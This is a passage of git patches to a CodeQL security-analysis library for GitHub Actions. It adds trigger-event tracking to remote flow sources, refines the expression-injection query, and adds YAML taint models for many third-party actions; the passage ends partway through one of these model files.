b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -39,8 +39,10 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } -predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { - exists(UsesExpr uses, string action, string version, string trigger, string kind | +predicate externallyDefinedSource( + DataFlow::Node source, string sourceType, string fieldName, string trigger +) { + exists(UsesExpr uses, string action, string version, string kind | sourceModel(action, version, fieldName, trigger, kind) and uses.getCallee() = action.toLowerCase() and ( diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 09094f2c580..0e82498bfc1 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -17,6 +17,8 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); + abstract string getATriggerEvent(); + override string getThreatModel() { result = "remote" } } @@ -109,20 +111,33 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } private class EventSource extends RemoteFlowSource { + string trigger; + EventSource() { exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | - isExternalUserControlledIssue(context) or - isExternalUserControlledPullRequest(context) or - isExternalUserControlledReview(context) or - isExternalUserControlledComment(context) or - isExternalUserControlledGollum(context) or - isExternalUserControlledCommit(context) or - isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) + trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) + or + trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and + isExternalUserControlledPullRequest(context) + or + trigger = ["pull_request_review"] and isExternalUserControlledReview(context) + or + trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and + isExternalUserControlledComment(context) + or + trigger = ["gollum"] and isExternalUserControlledGollum(context) + or + trigger = ["push"] and isExternalUserControlledCommit(context) + or + trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context) + or + trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context) ) } override string getSourceType() { result = "User-controlled events" } + + override string getATriggerEvent() { result = trigger } } /** @@ -130,10 +145,13 @@ private class EventSource extends RemoteFlowSource { */ private class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; + string trigger; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) } override string getSourceType() { result = sourceType } + + override string getATriggerEvent() { result = trigger } } /** @@ -145,4 +163,6 @@ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } override string getSourceType() { result = "Composite action input" } + + override string getATriggerEvent() { result = "*" } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index e1a3479cfc0..2d77b347348 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -173,7 +173,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -218,7 +218,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or astTo.getRefExpr() = astFrom ) ) diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 8f449f6b26d..34cb56a01ad 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,7 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 6ee41e93826..6fefec9a4f8 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index f19a2da37f5..d7cbde25b88 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,17 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml new file mode 100644 index 00000000000..20383f415c2 --- /dev/null +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/tj-actions/branch-names + - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"] + - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] + diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index fc5557db6ea..21a0b479ef5 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,37 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 76d83bd249e..9b6649892af 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 624bd32e45c..a6baf060c9d 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -42,6 +42,6 @@ where .asExpr() .(Statement) .getEnclosingWorkflowStmt() - .hasTriggerEvent("pull_request_target") + .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection, which may be controlled by an external user." From e1d6c7dac413e8d0b6564678998613797097468c Mon Sep 17 00:00:00 2001 From: jorgectf Date: Wed, 21 Feb 2024 15:29:27 +0100 Subject: [PATCH 0065/1267] Add some steps --- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 6 ++++++ ql/lib/ext/android-actions_setup-android.model.yml | 6 ++++++ .../ext/apple-actions_import-codesign-certs.model.yml | 6 ++++++ .../ashley-taylor_read-json-property-action.model.yml | 6 ++++++ .../ext/ashley-taylor_regex-property-action.model.yml | 7 +++++++ ql/lib/ext/aszc_change-string-case-action.model.yml | 8 ++++++++ .../aws-actions_configure-aws-credentials.model.yml | 11 +++++++++++ ql/lib/ext/bobheadxi_deployments.model.yml | 6 ++++++ ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 6 ++++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 6 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 ++++++ ql/lib/ext/coursier_cache-action.model.yml | 6 ++++++ ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 6 ++++++ ql/lib/ext/csexton_release-asset-action.model.yml | 6 ++++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 6 ++++++ ql/lib/ext/frabert_replace-string-action.model.yml | 4 ++-- .../ext/franzdiebold_github-env-vars-action.model.yml | 7 +++++++ ql/lib/ext/game-ci_unity-test-runner.model.yml | 6 ++++++ ql/lib/ext/getsentry_action-release.model.yml | 7 +++++++ ql/lib/ext/github_codeql-action.model.yml | 6 ++++++ ql/lib/ext/gradle_gradle-build-action.model.yml | 8 ++++++++ ql/lib/ext/haya14busa_action-cond.model.yml | 7 +++++++ ql/lib/ext/hexlet_project-action.model.yml | 6 ++++++ ql/lib/ext/jsdaniell_create-json.model.yml | 8 ++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 6 ++++++ .../ext/khan_pull-request-comment-trigger.model.yml | 7 +++++++ ...ner_circleci-artifacts-redirector-action.model.yml | 6 ++++++ .../mad9000_actions-find-and-replace-string.model.yml | 4 ++-- ql/lib/ext/mattdavis0351_actions.model.yml | 7 +++++++ .../ext/metro-digital_setup-tools-for-waas.model.yml | 6 ++++++ ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 6 ++++++ ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 ++++++ ql/lib/ext/ruby_setup-ruby.model.yml | 6 ++++++ ...alsify_action-detect-and-tag-new-version.model.yml | 6 ++++++ ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 6 ++++++ ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 6 ++++++ ql/lib/ext/suisei-cn_actions-download-file.model.yml | 6 ++++++ ql/lib/ext/timheuer_base64-to-file.model.yml | 7 +++++++ ql/lib/ext/tzkhan_pr-update-action.model.yml | 6 ++++++ ql/lib/ext/xt0rted_slash-command-action.model.yml | 7 +++++++ 40 files changed, 251 insertions(+), 4 deletions(-) create mode 100644 ql/lib/ext/akhileshns_heroku-deploy.model.yml create mode 100644 ql/lib/ext/android-actions_setup-android.model.yml create mode 100644 ql/lib/ext/apple-actions_import-codesign-certs.model.yml create mode 100644 ql/lib/ext/ashley-taylor_read-json-property-action.model.yml create mode 100644 ql/lib/ext/ashley-taylor_regex-property-action.model.yml create mode 100644 ql/lib/ext/aszc_change-string-case-action.model.yml create mode 100644 ql/lib/ext/aws-actions_configure-aws-credentials.model.yml create mode 100644 ql/lib/ext/bobheadxi_deployments.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-breaking-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-lint-action.model.yml create mode 100644 ql/lib/ext/cachix_cachix-action.model.yml create mode 100644 ql/lib/ext/coursier_cache-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml create mode 100644 ql/lib/ext/csexton_release-asset-action.model.yml create mode 100644 ql/lib/ext/delaguardo_setup-clojure.model.yml create mode 100644 ql/lib/ext/franzdiebold_github-env-vars-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-test-runner.model.yml create mode 100644 ql/lib/ext/getsentry_action-release.model.yml create mode 100644 ql/lib/ext/github_codeql-action.model.yml create mode 100644 ql/lib/ext/gradle_gradle-build-action.model.yml create mode 100644 ql/lib/ext/haya14busa_action-cond.model.yml create mode 100644 ql/lib/ext/hexlet_project-action.model.yml create mode 100644 ql/lib/ext/jsdaniell_create-json.model.yml create mode 100644 ql/lib/ext/jwalton_gh-ecr-push.model.yml create mode 100644 ql/lib/ext/khan_pull-request-comment-trigger.model.yml create mode 100644 ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml create mode 100644 ql/lib/ext/mattdavis0351_actions.model.yml create mode 100644 ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml create mode 100644 ql/lib/ext/mishakav_pytest-coverage-comment.model.yml create mode 100644 ql/lib/ext/mymindstorm_setup-emsdk.model.yml create mode 100644 ql/lib/ext/ruby_setup-ruby.model.yml create mode 100644 ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml create mode 100644 ql/lib/ext/shallwefootball_upload-s3-action.model.yml create mode 100644 ql/lib/ext/shogo82148_actions-setup-perl.model.yml create mode 100644 ql/lib/ext/suisei-cn_actions-download-file.model.yml create mode 100644 ql/lib/ext/timheuer_base64-to-file.model.yml create mode 100644 ql/lib/ext/tzkhan_pr-update-action.model.yml create mode 100644 ql/lib/ext/xt0rted_slash-command-action.model.yml diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml new file mode 100644 index 00000000000..73e49a1fb06 --- /dev/null +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml new file mode 100644 index 00000000000..11ea0ae7922 --- /dev/null +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml new file mode 100644 index 00000000000..2fdf6c78d53 --- /dev/null +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml new file mode 100644 index 00000000000..fb837050879 --- /dev/null +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml new file mode 100644 index 00000000000..d3b929956d1 --- /dev/null +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"] + - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml new file mode 100644 index 00000000000..f4527cf1b7f --- /dev/null +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml new file mode 100644 index 00000000000..f9510094295 --- /dev/null +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml new file mode 100644 index 00000000000..a458e229e04 --- /dev/null +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml new file mode 100644 index 00000000000..a6cfbb6ee9e --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml new file mode 100644 index 00000000000..9fb754ea9e1 --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml new file mode 100644 index 00000000000..bd9563317fb --- /dev/null +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml new file mode 100644 index 00000000000..951a297207d --- /dev/null +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml new file mode 100644 index 00000000000..ab6458028a5 --- /dev/null +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml new file mode 100644 index 00000000000..084e3328dc8 --- /dev/null +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml new file mode 100644 index 00000000000..b2872259fe9 --- /dev/null +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 76ce81b394e..79fd5c76e4a 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["frabert/replace-string-action", "*", "string", "replaced", "taint"] - - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml new file mode 100644 index 00000000000..8475cb66c02 --- /dev/null +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request", "PR body"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request", "PR title"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml new file mode 100644 index 00000000000..a0d4b357b5a --- /dev/null +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml new file mode 100644 index 00000000000..d416a71c91d --- /dev/null +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["getsentry/action-release", "*", "input.version", "output.version", "taint"] + - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml new file mode 100644 index 00000000000..3710f7e07b8 --- /dev/null +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml new file mode 100644 index 00000000000..6ea8a6c6800 --- /dev/null +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml new file mode 100644 index 00000000000..f0e0752b735 --- /dev/null +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"] + - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml new file mode 100644 index 00000000000..4499d91cab6 --- /dev/null +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml new file mode 100644 index 00000000000..a0f59b9e38b --- /dev/null +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"] + - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"] + - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml new file mode 100644 index 00000000000..8ae3bb0035d --- /dev/null +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -0,0 +1,6 @@ 